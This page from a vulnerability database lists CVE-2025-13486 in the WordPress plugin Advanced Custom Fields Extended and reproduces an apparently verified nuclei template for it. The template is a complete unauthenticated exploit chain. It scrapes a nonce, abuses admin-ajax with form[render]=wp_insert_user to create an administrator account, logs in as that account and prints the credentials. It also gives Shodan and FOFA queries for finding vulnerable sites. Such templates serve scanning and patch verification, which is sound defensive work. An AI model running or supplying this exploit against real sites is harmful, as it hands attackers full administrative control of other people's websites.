Lucene search
K

Advanced Custom Fields Extended < 0.9.2 - Remote Code Execution

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Advanced Custom Fields Extended plugin versions 0.9.0.5–0.9.1.1 allow remote code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-13486
19 Dec 202510:49
githubexploit
GithubExploit
Exploit for CVE-2025-13486
3 Dec 202517:22
githubexploit
GithubExploit
Exploit for CVE-2025-13486
4 Dec 202507:54
githubexploit
GithubExploit
Ntemplatesbyxit
7 May 202615:36
githubexploit
GithubExploit
Exploit for CVE-2025-13486
5 Dec 202507:57
githubexploit
GithubExploit
Exploit for CVE-2025-13486
6 Dec 202513:54
githubexploit
GithubExploit
Exploit for CVE-2025-13486
4 Dec 202523:28
githubexploit
Circl
CVE-2025-13486
3 Dec 202506:26
circl
CNNVD
WordPress plugin Advanced Custom Fields Extended 代码注入漏洞
3 Dec 202500:00
cnnvd
CVE
CVE-2025-13486
3 Dec 202506:47
cve
Rows per page
id: CVE-2025-13486

info:
  name: Advanced Custom Fields Extended < 0.9.2 - Remote Code Execution
  author: 0xanis
  severity: critical
  description: |
    Advanced Custom Fields: Extended WordPress plugin 0.9.0.5 through 0.9.1.1 contains a remote code execution caused by unsafe use of call_user_func_array() in prepare_form() function, letting unauthenticated attackers execute arbitrary code remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to backdoor installation or creation of admin accounts.
  remediation: |
    Update to the latest version beyond 0.9.1.1.
  reference:
    - https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13486
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/acf-extended"
  tags: cve,cve2025,wordpress,wp-plugin,acfe,rce,vkev

variables:
  username: "admin_{{rand_text_alpha(4)}}"
  password: "admin_{{rand_text_alpha(4)}}"
  email: "{{username}}@{{rand_base(5)}}.com"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'acf\.data.*?"nonce":"([a-f0-9]+)"'
        internal: true
        name: nonce

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=acfe/form/render_form_ajax&nonce={{nonce}}&form[render]=wp_insert_user&form[user_login]={{username}}&form[user_pass]={{password}}&form[user_email]={{email}}&form[role]=administrator

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Username: " + username + " | Password: " + password'
# digest: 4b0a00483046022100ab18f19323b7a1e4275e9b777be6e8e101a40bbcc8d29d5a01853dbf5d1aae56022100b8dd55d0dfe2f888f1554008b623f5777fc0bbb8ae03a228e413dc02127ac5a9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.7High risk
Vulners AI Score8.7
CVSS 3.19.8
EPSS0.73557
SSVC
26